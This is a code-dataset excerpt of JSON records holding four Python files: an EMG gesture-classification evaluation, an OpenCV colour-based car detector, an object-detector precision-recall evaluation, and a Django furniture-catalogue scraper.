"tensorflow.nn", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits_v2", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "71929097687", "text": "import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport EMG_FCNs_250 as FCNs\nimport pandas as pd\n#############################################################################################################################\nsfreq = 1000 #sample Frequency\nlow_pass = 3 #cut off frequency for enveloped signal\nhigh_band = 20 #cut off frequency for raw signal\nlow_band = 450 #cut off frequency for raw signal\nnotch_freq = 50 #Notch frequency 50/60Hz depens on grid\nwindow_size=250 #Datasegment for Feature extraction\noverlap=250\nx = 0 #Overlap of Segments: Window_size - overlap\nlabel_name = 'test_data'\nrun = 3\n# Fist = 1 ; Pinch = 2; Thump = 3; Spred = 4\n\nlabel_list_1 = [2, 4, 4, 3, 2, 1, 3, 1, 3, 1]\nlabel_list_2 = [3, 2, 1, 2, 3, 4, 3, 2, 1, 4]\nlabel_list_3 = [3, 2, 4, 1, 2, 4, 2, 3, 2, 1]\nlabel_list_4 = [1, 1, 3, 3, 1, 4, 4, 2, 3, 3]\nlabel_list_5 = [2, 4, 1, 3, 2, 3, 3, 4, 3, 2]\nlabel_list_6 = [3, 4, 1, 1, 4, 4, 2, 3, 2, 4]\nlabel_list_7 = [3, 3, 4, 4, 1, 3, 1, 4, 2, 2]\nlabel_list_8 = [1, 1, 4, 3, 2, 1, 2, 3, 1, 3]\nlabel_list_9 = [4, 4, 2, 3, 1, 1, 3, 4, 2, 1]\nlabel_list_10 =[2, 3, 4, 4, 3, 1, 4, 2, 1, 4]\n\nlabel_list = [\n label_list_1,\n label_list_2,\n label_list_3,\n label_list_4,\n label_list_5,\n label_list_6,\n label_list_7,\n label_list_8,\n label_list_9,\n label_list_10\n]\n\ndef get_element_at_index(label_list, index):\n if index < 0 or index >= len(label_list):\n return None\n return label_list[index]\n\n\nlabel_list = get_element_at_index(label_list, run-1)\n\ntest_path = r'C:\\Users\\Peter Rott\\Desktop\\Masterthesis\\Coding\\PYTHON_files\\Real_time_classification\\Test_sequences'\nfilename = r'./Data/Data_0%s.txt'%run\nlabel_file = r'./Label/Label_0%s.txt'%run\n\n#Import EMG data\ncolum_names = ['emg_1','emg_2','emg_3','emg_4','emg_5','emg_6'] \nraw_data = pd.read_csv(test_path+filename, delimiter=';', names=colum_names)\nlabel_data = pd.read_csv(test_path + label_file, names= ['Label'])\nemg_sum_data = raw_data.iloc[:, :6].sum(axis=1)/6 \n\n#new_row = [0]\n#label_data = label_data.append(pd.Series(new_row, index=label_data.columns), ignore_index=True) #build an avg of all sensor data\n############################################################################################################################# \n \n#Signal processing for each sensor\ntime = FCNs.time_calc(raw_data) #calculates the recorded time with the sensor sampels\nemg_without_offset = FCNs.remove_mean(raw_data,time,250) #removing the offset of the EMG signal\nfiltered_emg = FCNs.filteremg(time, emg_without_offset, low_pass, sfreq, high_band, low_band,notch_freq) #filters the EMG signal with bandbass and notch filter\nfiltered_emg = pd.DataFrame(filtered_emg)\n#############################################################################################################################\n \n#Signal processing for the avg sesnor values\nemg_sum_data_df = emg_sum_data.to_frame() #transformation to data frame\nemg_sum_without_offset = FCNs.remove_mean (emg_sum_data_df,time,250) #removing the offset of the EMG signal\nfiltered_emg_sum = FCNs.filteremg(time, emg_sum_without_offset, low_pass, sfreq, high_band, low_band,notch_freq) #filters the EMG signal with bandbass and notch filter\nfiltered_emg_sum =pd.DataFrame(filtered_emg_sum)\n#############################################################################################################################\n \n#Feature extraction\nemg_features = FCNs.extract_emg_features(filtered_emg, window_size, overlap) #Feature extraction\nemg_features_sum = FCNs.extract_emg_features(filtered_emg_sum, window_size, overlap)\nWL_sum = FCNs.calculate_wave_length(filtered_emg_sum, window_size, overlap)\nemg_features_WL_sum = pd.concat([emg_features, WL_sum], axis=1)\n\n#############################################################################################################################\n \n#Data labelling\nemg_features_labeled, label, wl_threshold, line_values = FCNs.label_emg_features(emg_features_WL_sum, label_name, x) #Feature labeling\nemg_features_replaced = FCNs.replace_zero_labels(emg_features_labeled, label) \nfor i in range(2):\n emg_features_final = FCNs.replace_labels_zero(emg_features_replaced,label) #replace wrong detected labels\n\nemg_features_with_correct_label = FCNs.replace_labels(emg_features_replaced['Label'], label_list)\nemg_features_replaced['Label'] = emg_features_with_correct_label\n\nFCNs.plot_WL(emg_features_replaced, wl_threshold, 'Wavelentgh feature of the gesture '+label_name)\nemg_features_final = emg_features_replaced.drop('WL_sum', axis=1)\nemg_features_sum_final = emg_features_sum.assign(Label=emg_features_final['Label'])\n\nplot_data = emg_features_sum_final [[\"Label\"]]\nFCNs.plot_features (plot_data,raw_data.iloc[:, 1],time,'')\nFCNs.plot_labels(plot_data,filtered_emg.iloc[:, 1],time,'Correct labels and the predicted Labels',label_data)\n#############################################################################################################################\n\ndef print_confusion_matrix(y_true, y_pred, title, report=True):\n labels = sorted(list(set(y_true)))\n cmx_data = confusion_matrix(y_true, y_pred, labels=labels)\n df_cmx = pd.DataFrame(cmx_data, index=labels, columns=labels)\n fig, ax = plt.subplots(figsize=(7, 6))\n sns.heatmap(df_cmx, annot=True, fmt='g' ,square=False)\n ax.set_ylim(len(set(y_true)), 0)\n ax.set_title(title)\n plt.show()\n \n if report:\n print('Classification Report')\n print(classification_report(y_true, y_pred))\n\ny_true = emg_features_final.loc[:, \"Label\"]\nprint_confusion_matrix(y_true, label_data, 'Confusion Matrix for ANN real time classification')", "repo_name": "PeterR96/EMG_wristband_to-_control_virtual_hand_prosthesis", "sub_path": "Code/PYTHON_files/Load_and_procsess_Data/Confusion_real_time_data.py", "file_name": "Confusion_real_time_data.py", "file_ext": "py", "file_size_in_byte": 6464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 58, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.time_calc", "line_number": 66, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.remove_mean", "line_number": 67, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.filteremg", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.remove_mean", "line_number": 74, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.filteremg", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.extract_emg_features", "line_number": 80, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.extract_emg_features", "line_number": 81, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.calculate_wave_length", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 83, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.label_emg_features", "line_number": 88, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.replace_zero_labels", "line_number": 89, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.replace_labels_zero", "line_number": 91, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.replace_labels", "line_number": 93, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.plot_WL", "line_number": 96, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.plot_features", "line_number": 101, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.plot_labels", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "13140214980", "text": "# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\nimport cv2\r\nimport numpy as np\r\n\r\nlowerBoundb = np.array([100, 100, 102])\r\nupperBoundb = np.array([130, 255, 255])\r\n\r\nlowerBoundg = np.array([70, 50, 51])\r\nupperBoundg = np.array([90, 255, 255])\r\n\r\ncam = cv2.VideoCapture(1)\r\nkernelOpen = np.ones((5, 5))\r\nkernelClose = np.ones((20, 20))\r\n\r\nwhile True:\r\n ret, img = cam.read()\r\n img = cv2.resize(img, (340, 220))\r\n\r\n # convert BGR to HSV\r\n imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n # create the Mask\r\n maskb = cv2.inRange(imgHSV, lowerBoundb, upperBoundb)\r\n maskg = cv2.inRange(imgHSV, lowerBoundg, upperBoundg)\r\n # morphology\r\n maskOpenb = cv2.morphologyEx(maskb, cv2.MORPH_OPEN, kernelOpen)\r\n maskCloseb = cv2.morphologyEx(maskOpenb, cv2.MORPH_CLOSE, kernelClose)\r\n\r\n maskOpeng = cv2.morphologyEx(maskg, cv2.MORPH_OPEN, kernelOpen)\r\n maskCloseg = cv2.morphologyEx(maskOpeng, cv2.MORPH_CLOSE, kernelClose)\r\n\r\n maskFinalb = maskCloseb\r\n maskFinalg = maskCloseg\r\n contsb, hb = cv2.findContours(maskFinalb.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n contsg, hg = cv2.findContours(maskFinalg.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n\r\n cv2.drawContours(img, contsb, -1, (255, 0, 0), 3)\r\n print(\"blue\")\r\n print(len(contsb))\r\n print(\"green\")\r\n cv2.drawContours(img, contsg, -1, (255, 0, 0), 3)\r\n print(len(contsg))\r\n\r\n cv2.imshow(\"maskb\", maskb)\r\n cv2.imshow(\"maskg\", maskg)\r\n cv2.imshow(\"cam\", img)\r\n cv2.waitKey(10)", "repo_name": "rospodu98/Automated_Traffic_Light_Controller", "sub_path": "multicolorcar.py", "file_name": "multicolorcar.py", "file_ext": "py", "file_size_in_byte": 1529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.morphologyEx", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "9331274425", "text": "from __future__ import print_function, division\nimport os\nimport torch\nfrom torchvision import datasets, transforms, utils\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom PIL import Image, ImageDraw\nimport pandas as pd\nimport json\n\n# Define the dataset\nclass CarsDataset(Dataset):\n\n def __init__(self, annos_path, data_dir, transform=None):\n \"\"\"\n Args:\n annos_path (string): Path to the csv file with annotations.\n data_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.car_details = pd.read_csv(annos_path)\n self.car_details = np.array(self.car_details)\n\n self.data_dir = data_dir\n self.transform = transform\n\n def __len__(self):\n return len(self.car_details)\n\n def __getitem__(self, idx):\n img_name = os.path.join(self.data_dir, self.car_details[idx][0])\n file_name = self.car_details[idx][0]\n image = Image.open(img_name)\n num_channel = len(image.split())\n car_class = self.car_details[idx][5]\n car_details = self.car_details[idx][6]\n x1, y1, x2, y2 = self.car_details[idx][1], self.car_details[idx][2], self.car_details[idx][3], self.car_details[idx][4]\n bounding_box = torch.as_tensor([[x1, y1, x2, y2]], dtype=torch.float32)\n area = (bounding_box[:, 3] - bounding_box[:, 1]) * (bounding_box[:, 2] - bounding_box[:, 0])\n\n # Pytorch's Faster RCNN recognizes labels of 0 as background\n if car_class == 0:\n car_class = 196\n \n target = {}\n target['boxes'] = bounding_box\n target['labels'] = torch.as_tensor([car_class], dtype=torch.int64)\n target['image_id'] = torch.as_tensor(idx)\n target['area'] = area\n target['iscrowd'] = iscrowd = torch.zeros(1, dtype=torch.int64)\n \n if self.transform:\n image = self.transform(image)\n \n return image, target, car_details, file_name\n \ndef compute_counts(preds, targets, iou_thr, score_thr):\n # define counters for the number of true positives, false poistives, and false negatives\n TP = 0\n FP = 0\n FN = 0\n\n # loop through all of the files\n for pred_file, pred in preds.items():\n # get the ground truths for each file\n gts = targets[pred_file]\n\n # reset the counter for the number of predictions and true postives for the image\n num_preds = 0\n tp = 0\n\n # get the number of ground truths for the image\n num_gt = len(gts['labels'])\n # loop through each prediction for the image\n for j in range(len(pred['labels'])):\n\n # check if the score of the prediction exceeds the threshold\n if (pred['scores'][j] >= score_thr):\n\n # increment the number of predictions\n num_preds += 1\n\n # check to see if there are still ground truths to be matched\n if tp < num_gt:\n\n # check to see if the label matches\n if (pred['labels'][j] == gts['labels'][0]):\n\n # compute the iou for the bounding boxes\n iou = compute_iou(pred['boxes'][j], gts['boxes'][0])\n \n #check to see if the iou exceeds the threshold\n if iou > iou_thr:\n tp += 1\n\n # compute the number of false positives\n fp = num_preds - tp\n\n # compute the number of false negatives\n fn = num_gt - tp\n\n # update the overall counters\n TP += tp\n FP += fp\n FN += fn\n\n return TP, FP, FN\n\ndef compute_iou(box_1, box_2):\n '''\n This function takes a pair of bounding boxes and returns intersection-over-\n union (IoU) of two bounding boxes.\n '''\n \n # calculate the area of each box\n area_1 = (box_1[2]-box_1[0])*(box_1[3]-box_1[1])\n area_2 = (box_2[2]-box_2[0])*(box_2[3]-box_2[1])\n\n # find the top left and bottom right corners of the intersection\n mins = np.amin([box_1,box_2],axis = 0)\n maxes = np.amax([box_1,box_2],axis = 0)\n\n i = np.concatenate((maxes[:2],mins[2:]), axis = None)\n \n # calculate the area of the intersection\n if (i[2] >= i[0]) and (i[3] >= i[1]):\n area_i = (i[2]-i[0])*(i[3]-i[1])\n else:\n area_i = 0\n\n # calculate the area of the union\n area_u = area_1 + area_2 - area_i\n\n # calculate iou\n iou = area_i/area_u\n\n assert (iou >= 0) and (iou <= 1.0)\n\n return iou\n\n# function for getting the precision and recall\ndef get_pr(preds, targets, iou_thrs, score_thrs):\n precision = []\n recall = []\n for iou_thr in iou_thrs:\n tp = np.zeros(len(score_thrs))\n fp = np.zeros(len(score_thrs))\n fn = np.zeros(len(score_thrs))\n for i, score_thr in enumerate(score_thrs):\n tp[i], fp[i], fn[i] = compute_counts(preds, targets, iou_thr=iou_thr, score_thr=score_thr)\n\n # get the total number of predictions and ground truths\n n_preds = tp + fp\n n_gt = tp + fn\n\n precision.append(tp/n_preds)\n recall.append(tp/n_gt)\n\n return precision, recall\n\n# Setup the paths\ntrain_path = './data/cars_train/'\ntest_path = './data/cars_test/'\ndevkit_path = './data/cars_devkit'\n\ntrain_annos_path = devkit_path + '/cars_train_annos.csv'\ntest_annos_path = devkit_path + '/cars_test_annos.csv'\ncars_meta_path = devkit_path + '/cars_meta.csv'\n\n# Load in the training and validation predictions and targets\ntrain_file_names = np.load('train_file_names.npy')\nwith open('train_preds.json','r') as f:\n train_preds = json.load(f)\nwith open('train_targets.json','r') as f:\n train_targets = json.load(f)\n\nval_file_names = np.load('val_file_names.npy')\nwith open('val_preds.json','r') as f:\n val_preds = json.load(f)\nwith open('val_targets.json','r') as f:\n val_targets = json.load(f)\n\n# get the precision and recall for the training and validation sets\nprecision_train, recall_train = get_pr(train_preds, train_targets, iou_thrs = [0.75], score_thrs = np.arange(0,1,0.01))\nprecision_val, recall_val = get_pr(val_preds, val_targets, iou_thrs = [0.75], score_thrs = np.arange(0,1,0.01))\n\n# plot training PR curve\nfor i in range(len(precision_train)):\n plt.figure(1)\n plt.plot(recall_train[i],precision_train[i])\n plt.xlim(0,1)\n plt.ylim(0,1)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title('Training Set')\n\n# plot the validation PR curve\nfor i in range(len(precision_val)):\n plt.figure(2)\n plt.plot(recall_val[i],precision_val[i])\n plt.xlim(0,1)\n plt.ylim(0,1)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title('Validation Set')\n\nplt.show()", "repo_name": "amoraru100/caltech-ee148-spring2020-project", "sub_path": "evaluate_detector.py", "file_name": "evaluate_detector.py", "file_ext": "py", "file_size_in_byte": 6849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 13, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.as_tensor", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.amin", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 173, "usage_type": "call"}, {"api_name": "json.load", "line_number": 175, "usage_type": "call"}, {"api_name": "json.load", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 179, "usage_type": "call"}, {"api_name": "json.load", "line_number": 181, "usage_type": "call"}, {"api_name": "json.load", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}]}
+{"seq_id": "33669377521", "text": "from django.shortcuts import render\nfrom .models import Couch\nfrom rest_framework import viewsets\nfrom .serializers import CouchSerializer\n\n\nclass CouchViewSet(viewsets.ModelViewSet):\n queryset = Couch.objects.all()\n serializer_class = CouchSerializer\n\ndef create_db(request):\n import requests\n from bs4 import BeautifulSoup as bs\n from time import sleep\n\n site_url = \"https://azbykamebeli.ru/catalog/0000057/\"\n page = 1\n all_items_urls = []\n\n while True:\n r = requests.get(f'{site_url}?page={page}')\n print(r.url)\n soup = bs(r.text, \"html.parser\")\n data = soup.find_all('div', class_='item__title h4')\n if not data:\n break\n for i in data:\n all_items_urls.append(\"https://azbykamebeli.ru\" + i.a['href'])\n page += 1\n sleep(5)\n clear_data = set(all_items_urls)\n with open('urls.txt', 'a') as f:\n for i in clear_data:\n f.write(i + '\\n')\n\n with open('urls.txt', 'r') as f:\n text = f.read().splitlines()\n for url in text:\n r = requests.get(url)\n soup = bs(r.text, \"html.parser\")\n\n # получаем id\n data = soup.find('div', class_='align-self-start')\n articul = data.find_all(\"span\")[0].get_text().split()[1]\n id = data.find_all(\"span\")[1].get_text().split()[1]\n\n # получаем имя\n name = soup.find('h1').get_text()\n print(name)\n\n # получаем цену со скидкой и без\n store_price_data = soup.find('a', class_='store-price fake-link').get_text().split()[:-1]\n if store_price_data:\n store_price = int(''.join(store_price_data))\n else:\n store_price = None\n\n online_price_data = soup.find('div', class_='online-price').get_text().split()[:-1]\n if online_price_data:\n online_price = int(float(''.join(online_price_data)))\n else:\n online_price = None\n print(online_price)\n\n # стутас доступен\\под заказ\n data = soup.find('span', class_='d-inline-block badge-pre-order')\n if data:\n status = data.get_text()\n else:\n status = 'доступен'\n Couch.objects.create(name = name, articul=articul, item_id = id, full_price = store_price,\n sale_price=online_price, status=status)\n sleep(2)\n\n\ndef get_avg_price_by_articul(request):\n from django.db.models import Avg\n\n qs = Couch.objects.aggregate(Avg('full_price'))", "repo_name": "Vladgavr96/parser", "sub_path": "azbuka/stats/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Couch.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "models.Couch.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "models.Couch", "line_number": 8, "usage_type": "name"}, {"api_name": "serializers.CouchSerializer", "line_number": 9, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Couch.objects.create", "line_number": 71, "usage_type": "call"}, {"api_name": "models.Couch.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "models.Couch", "line_number": 71, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Couch.objects.aggregate", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Couch.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Couch", "line_number": 79, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 79, "usage_type": "call"}]}
